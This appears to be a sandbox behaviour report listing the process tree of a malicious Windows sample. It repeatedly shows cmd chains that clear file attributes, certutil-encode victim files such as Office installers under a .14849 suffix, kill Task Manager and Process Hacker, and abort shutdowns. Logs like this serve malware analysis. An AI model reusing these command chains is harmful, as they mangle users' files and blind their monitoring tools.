C:\Windows\system32\certutil.execertutil -encode -f "vcredist2010_x86.log-MSI_vc_red.msi.txt" "vcredist2010_x86.log-MSI_vc_red.msi.txt".148495⤵PID:1636
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1252
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1660
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2010_x86.log.html" "vcredist2010_x86.log.html".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1680
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1892
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2010_x86.log.html" "vcredist2010_x86.log.html".148495⤵PID:1992
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2012_x64_0_vcRuntimeMinimum_x64.log" "vcredist2012_x64_0_vcRuntimeMinimum_x64.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:760
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:796
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2012_x64_0_vcRuntimeMinimum_x64.log" "vcredist2012_x64_0_vcRuntimeMinimum_x64.log".148495⤵PID:324
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2012_x64_1_vcRuntimeAdditional_x64.log" "vcredist2012_x64_1_vcRuntimeAdditional_x64.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1452
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1600
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2012_x64_1_vcRuntimeAdditional_x64.log" "vcredist2012_x64_1_vcRuntimeAdditional_x64.log".148495⤵PID:1596
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1644
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2012_x86_0_vcRuntimeMinimum_x86.log" "vcredist2012_x86_0_vcRuntimeMinimum_x86.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:900
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2012_x86_0_vcRuntimeMinimum_x86.log" "vcredist2012_x86_0_vcRuntimeMinimum_x86.log".148495⤵PID:1940
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:620
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:612
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2012_x86_1_vcRuntimeAdditional_x86.log" "vcredist2012_x86_1_vcRuntimeAdditional_x86.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
- Suspicious use of AdjustPrivilegeToken
PID:820 -
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1152
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2012_x86_1_vcRuntimeAdditional_x86.log" "vcredist2012_x86_1_vcRuntimeAdditional_x86.log".148495⤵PID:1068
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2013_x64_000_vcRuntimeMinimum_x64.log" "vcredist2013_x64_000_vcRuntimeMinimum_x64.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1532
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1440
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2013_x64_000_vcRuntimeMinimum_x64.log" "vcredist2013_x64_000_vcRuntimeMinimum_x64.log".148495⤵
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2013_x64_001_vcRuntimeAdditional_x64.log" "vcredist2013_x64_001_vcRuntimeAdditional_x64.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1436
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:520
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2013_x64_001_vcRuntimeAdditional_x64.log" "vcredist2013_x64_001_vcRuntimeAdditional_x64.log".148495⤵PID:1840
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2013_x86_000_vcRuntimeMinimum_x86.log" "vcredist2013_x86_000_vcRuntimeMinimum_x86.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:828
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1480
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2013_x86_000_vcRuntimeMinimum_x86.log" "vcredist2013_x86_000_vcRuntimeMinimum_x86.log".148495⤵PID:324
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:868
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2013_x86_001_vcRuntimeAdditional_x86.log" "vcredist2013_x86_001_vcRuntimeAdditional_x86.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1352
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1568
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2013_x86_001_vcRuntimeAdditional_x86.log" "vcredist2013_x86_001_vcRuntimeAdditional_x86.log".148495⤵PID:1884
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵
- Suspicious use of AdjustPrivilegeToken
PID:944
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2022_x64_000_vcRuntimeMinimum_x64.log" "vcredist2022_x64_000_vcRuntimeMinimum_x64.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908 -
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2022_x64_000_vcRuntimeMinimum_x64.log" "vcredist2022_x64_000_vcRuntimeMinimum_x64.log".148495⤵PID:328
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:572
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1776
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2022_x64_001_vcRuntimeAdditional_x64.log" "vcredist2022_x64_001_vcRuntimeAdditional_x64.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵
- Suspicious use of AdjustPrivilegeToken
PID:612 -
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:900
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2022_x64_001_vcRuntimeAdditional_x64.log" "vcredist2022_x64_001_vcRuntimeAdditional_x64.log".148495⤵PID:1152
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1068
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1932
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2022_x86_001_vcRuntimeMinimum_x86.log" "vcredist2022_x86_001_vcRuntimeMinimum_x86.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1636
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:820
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2022_x86_001_vcRuntimeMinimum_x86.log" "vcredist2022_x86_001_vcRuntimeMinimum_x86.log".148495⤵PID:332
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1252
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1660
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "vcredist2022_x86_002_vcRuntimeAdditional_x86.log" "vcredist2022_x86_002_vcRuntimeAdditional_x86.log".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1892
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1988
-
-
C:\Windows\system32\certutil.execertutil -encode -f "vcredist2022_x86_002_vcRuntimeAdditional_x86.log" "vcredist2022_x86_002_vcRuntimeAdditional_x86.log".148495⤵PID:436
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1816
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1752
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows" "Windows".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1436
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "S-1-5-21-999675638-2867687379-27515722-1000" "S-1-5-21-999675638-2867687379-27515722-1000".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1480
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "desktop.ini.20850" "desktop.ini.20850".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1488
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:324
-
-
C:\Windows\system32\certutil.execertutil -encode -f "desktop.ini.20850" "desktop.ini.20850".148495⤵PID:760
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:764
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:828
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "All Users" "All Users".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:556
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0011-0000-0000-0000000FF1CE}-C" "{90140000-0011-0000-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:912
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0016-0409-0000-0000000FF1CE}-C" "{90140000-0016-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1692
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0018-0409-0000-0000000FF1CE}-C" "{90140000-0018-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:852
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0019-0409-0000-0000000FF1CE}-C" "{90140000-0019-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1684
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-001A-0409-0000-0000000FF1CE}-C" "{90140000-001A-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1960
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-001B-0409-0000-0000000FF1CE}-C" "{90140000-001B-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1164
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-002C-0409-0000-0000000FF1CE}-C" "{90140000-002C-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1832
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0044-0409-0000-0000000FF1CE}-C" "{90140000-0044-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1920
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-00A1-0409-0000-0000000FF1CE}-C" "{90140000-00A1-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1452
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-00BA-0409-0000-0000000FF1CE}-C" "{90140000-00BA-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1088
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0115-0409-0000-0000000FF1CE}-C" "{90140000-0115-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1116
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0116-0409-1000-0000000FF1CE}-C" "{90140000-0116-0409-1000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:672
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "{90140000-0117-0409-0000-0000000FF1CE}-C" "{90140000-0117-0409-0000-0000000FF1CE}-C".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:656
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Office64WW.msi" "Office64WW.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:572
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:692
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Office64WW.msi" "Office64WW.msi".148495⤵PID:1564
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:900
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:648
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Office64WW.xml" "Office64WW.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1760
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1700
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Office64WW.xml" "Office64WW.xml".148495⤵PID:1656
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:820
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1624
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ose.exe" "ose.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1880
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1900
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ose.exe" "ose.exe".148495⤵PID:1652
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:680
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1388
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "osetup.dll" "osetup.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1572
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1560
-
-
C:\Windows\system32\certutil.execertutil -encode -f "osetup.dll" "osetup.dll".148495⤵PID:1928
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1148
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:744
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OWOW64WW.cab" "OWOW64WW.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1480
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:324
-
-
C:\Windows\system32\certutil.execertutil -encode -f "OWOW64WW.cab" "OWOW64WW.cab".148495⤵PID:1520
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1576
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:788
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PidGenX.dll" "PidGenX.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1488
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:556
-
-
C:\Windows\system32\certutil.execertutil -encode -f "PidGenX.dll" "PidGenX.dll".148495⤵PID:1736
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:852
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1352
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "pkeyconfig-office.xrm-ms" "pkeyconfig-office.xrm-ms".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1792
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:328
-
-
C:\Windows\system32\certutil.execertutil -encode -f "pkeyconfig-office.xrm-ms" "pkeyconfig-office.xrm-ms".148495⤵PID:1940
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:656
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1016
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ProPlusWW.msi" "ProPlusWW.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1152
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:900
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ProPlusWW.msi" "ProPlusWW.msi".148495⤵PID:648
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1428
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1820
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ProPlusWW.xml" "ProPlusWW.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1540
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:820
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ProPlusWW.xml" "ProPlusWW.xml".148495⤵PID:1624
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1664
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:680
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ProPsWW.cab" "ProPsWW.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1388
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1880
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ProPsWW.cab" "ProPsWW.cab".148495⤵PID:592
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1888
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1512
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ProPsWW2.cab" "ProPsWW2.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1436
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1840
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ProPsWW2.cab" "ProPsWW2.cab".148495⤵PID:1364
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1204
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1600
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "setup.exe" "setup.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1764
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:788
-
-
C:\Windows\system32\certutil.execertutil -encode -f "setup.exe" "setup.exe".148495⤵PID:1480
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1596
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1712
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1920
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1352
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Setup.xml" "Setup.xml".148495⤵PID:1672
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1716
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1688
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ExcelLR.cab" "ExcelLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:964
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1016
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ExcelLR.cab" "ExcelLR.cab".148495⤵PID:1792
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1456
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1420
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ExcelMUI.msi" "ExcelMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1428
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:332
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ExcelMUI.msi" "ExcelMUI.msi".148495⤵PID:1152
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1624
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1664
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ExcelMUI.xml" "ExcelMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:680
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1540
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ExcelMUI.xml" "ExcelMUI.xml".148495⤵PID:1560
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:592
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1888
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1512
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1388
-
-
